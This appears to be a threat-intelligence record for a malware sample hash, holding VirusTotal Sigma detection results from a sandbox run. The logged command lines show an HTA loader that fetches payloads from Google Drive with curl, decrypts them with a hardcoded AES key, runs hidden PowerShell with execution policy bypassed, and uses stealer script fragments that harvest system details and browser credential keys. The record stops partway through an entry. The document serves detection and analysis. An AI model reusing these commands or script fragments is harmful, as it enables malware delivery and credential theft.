0db53f4bbd5ca58c7a49994ca525ffcd
Hash
- MD5: 0db53f4bbd5ca58c7a49994ca525ffcd
- SHA1: df0ed60b6a989f51ac9cd6f367f25bd98c4bdd53
- SHA256: 3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8
- First Seen: 2026-05-26
- Last Seen: 2026-05-26
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal
{
"data": {
"id": "3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8"
},
"attributes": {
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "78dc71a5599dc85b3d37a6ab0f014aa5110b2ce1b2346c8f2730e0c481977781",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Curl Download And Execute Combination",
"rule_description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.",
"rule_author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "7d262d8417cb03b2a9d2b935ae55980f22abc3aa7cffc36e57eda761068226dc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b9bc90b7745bcb3a2cf9de40d1d419d18ead6650040015c7f4755848e9bfdb05",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious MSHTA Child Process",
"rule_description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution",
"rule_author": "Michael Haag",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "cmd /c sc query WinDefend",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"CommandLine": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "124bf07ac70743e91b5698e3731aae0330fc182aa58036390f2a0457a90b5341",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Download - Powershell Script",
"rule_description": "Detects suspicious PowerShell download command",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "2f2546b453b2e10b60c4d6b1345bc05c2dc99e42daef2e236a11005d772937ad",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Detected Windows Software Discovery - PowerShell",
"rule_description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.",
"rule_author": "Nikita Nazarov, oscd.community",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "#\r\nfunction DownloadFile {\r\n\tParam (\r\n\t\t[Parameter(Position=0,Mandatory=$True)] [String] $downloadUrl,\r\n\t\t[Parameter(Position=1,Mandatory=$True)] [String] $filePath\r\n\t)\r\n\t\r\n\tInvoke-WebRequest -Uri $downloadUrl -OutFile $filePath -UseBasicParsing\r\n}\r\n\r\n$id = (Get-WmiObject -Class Win32_ComputerSystemProduct).UUID\r\n$tempPath = $env:TEMP\r\nNew-Item -Path \"$tempPath\\$id\" -ItemType Directory -Force\r\n$storePath = \"$tempPath\\$id\"\r\n\r\n$serverenc = \"https://drive.google.com/uc?export=download`&id=1FA9Tvcak [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6e1823de286f8bef414c648f5738bec3bd40700cba3765da26e6500bc2d8e387",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Detect Virtualization Environment",
"rule_description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n",
"rule_author": "frack113, Duc.Le-GTSC",
"match_context": [
{
"values": {
"ScriptBlockText": "#\r\nfunction DownloadFile {\r\n\tParam (\r\n\t\t[Parameter(Position=0,Mandatory=$True)] [String] $downloadUrl,\r\n\t\t[Parameter(Position=1,Mandatory=$True)] [String] $filePath\r\n\t)\r\n\t\r\n\tInvoke-WebRequest -Uri $downloadUrl -OutFile $filePath -UseBasicParsing\r\n}\r\n\r\n$id = (Get-WmiObject -Class Win32_ComputerSystemProduct).UUID\r\n$tempPath = $env:TEMP\r\nNew-Item -Path \"$tempPath\\$id\" -ItemType Directory -Force\r\n$storePath = \"$tempPath\\$id\"\r\n\r\n$serverenc = \"https://drive.google.com/uc?export=download`&id=1FA9Tvcak [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "7ce2e69836f6ffe690530adb579824031c46a1bee75e6f8dc9ec028fe59c5681",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Directory Enumeration",
"rule_description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "llName -Destination $destpath -ErrorAction SilentlyContinue\r\n\t\t\t} -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction GetBrowserData {\r\n\t$extensionpath = \"$storePath\\extensions.txt\"\r\n\t# Edge\r\n\ttry {\r\n\t\t$jsonContent = Get-Content -Path \"$localPath\\Microsoft\\Edge\\User Data\\Local State\" -Raw\r\n\t\t$jsonObject = $jsonContent | ConvertFrom-Json\r\n\t\tUnprotect-Data -encryptedData $jsonObject.os_crypt.encrypted_key -filePath \"$storePath\\edge_masterkey\"\r\n\r\n\t\t$edgeProcess = Get-Process -Name \"msedge\" -Error [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"CommandLine": "curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "low",
"rule_id": "0f8e3c8e1fbbfbe7cf4a673a7445d726cd5c91d52f036a090b8e242dd368058e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious File Access to Browser Credential Storage",
"rule_description": "Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\nAdversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\nThis behavior is often commonly observed in credential stealing malware.\n",
"rule_author": "frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore",
"match_context": [
{
"values": {
"FileName": "%LOCALAPPDATA%\\microsoft\\edge\\user data\\default\\login data"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "PowerShell.EXE",
